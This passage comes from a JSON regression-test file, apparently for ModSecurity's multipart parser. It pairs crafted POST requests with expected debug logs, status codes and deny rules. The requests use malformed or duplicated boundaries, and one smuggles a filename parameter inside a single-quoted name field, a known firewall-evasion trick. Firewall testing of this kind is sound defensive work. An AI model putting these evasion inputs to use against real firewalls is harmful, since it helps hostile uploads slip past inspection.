"enabled":1, "version_min":300000, "title":"multipart parser (C-D uses single quotes)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data; name=\"a\"\r", "\r", "1\r", "-----------------------------69343412719991675451336310646\r", "Content-Disposition: form-data; name=';filename=\"dummy';name=b;\"\r", "\r", "2\r", "-----------------------------69343412719991675451336310646--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Duplicate Content-Disposition name", "http_code": 200 }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_INVALID_QUOTING \"!@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (invalid C-T boundary separator - comma)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data, boundary=0000", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Invalid boundary in C-T \\(malformed\\)", "http_code": 403 }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (invalid C-T boundary separator - space)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data boundary=0000", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403 }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (invalid C-T boundary parameter name - case)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; bOundAry=0000", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403, "debug_log": "Invalid boundary in C-T \\(case sensitivity\\)" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (invalid C-T boundary parameter name - trailing chars)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary123=0000", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403, "debug_log": "Invalid boundary in C-T \\(parameter name\\)" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (multiple C-T boundaries - first quoted)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=\"0000\"; boundary=1111", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403, "debug_log": "Multiple boundary parameters in C-T" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (multiple C-T boundaries - comma separated)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=0000, boundary=1111", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403, "debug_log": "Multiple boundary parameters in C-T" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (boundary whitespace in C-T - after name)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary =0000", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403 }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (boundary whitespace in C-T - before value)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary= 0000", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403, "debug_log": "boundary whitespace in C-T header" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (boundary whitespace in C-T - after value) - apache removes the whitespace, not the case for us... TODO", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=0000 ", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403 }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (boundary special char - trailing whitespace+token)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data;boundary=0000 1111", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403, "debug_log": "No boundaries found in payload" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (boundary special char - trailing exclamation+token)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data;boundary=0000!1111", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403, "debug_log": "Invalid boundary in C-T \\(characters\\)" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (quoted boundary - normal)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data;boundary=\"0000\"", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403, "debug_log": "boundary was quoted" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (quoted boundary value - whitespace before)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data;boundary=\" 0000\"", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403, "debug_log": "boundary was quoted.*No boundaries found in payload" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (quoted boundary value - whitespace after)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data;boundary=\"0000 \"", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403, "debug_log": "Invalid boundary in C-T \\(characters\\).*boundary was quoted." }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (quoted boundary value - whitespace after)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data;boundary=\"0000 \"", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403, "debug_log": "Invalid boundary in C-T \\(characters\\).*boundary was quoted." }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (quoted boundary value - whitespace between)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data;boundary=\"0000 1111\"", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403, "debug_log": "boundary was quoted" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (quoted boundary value - contained quote)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data;boundary=\"00\"00\"", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--00\"00\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--00\"00\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--00\"00\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--00\"00--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403, "debug_log": "Invalid boundary in C-T \\(characters\\)" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (quoted boundary value - two quoted values)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data;boundary=\"00\"\"00\"", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--00\"00\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--00\"00\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--00\"00\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--00\"00--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403, "debug_log": "Invalid boundary in C-T \\(characters\\)" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (partial quoted boundary value - only start quote)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data;boundary=\"0000", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403, "debug_log": "Invalid boundary in C-T \\(quote\\)" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (partial quoted boundary value - only end quote)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data;boundary=0000\"", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403, "debug_log": "Invalid boundary in C-T \\(quote\\)" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (multipart mixed - normal)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=0000", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", 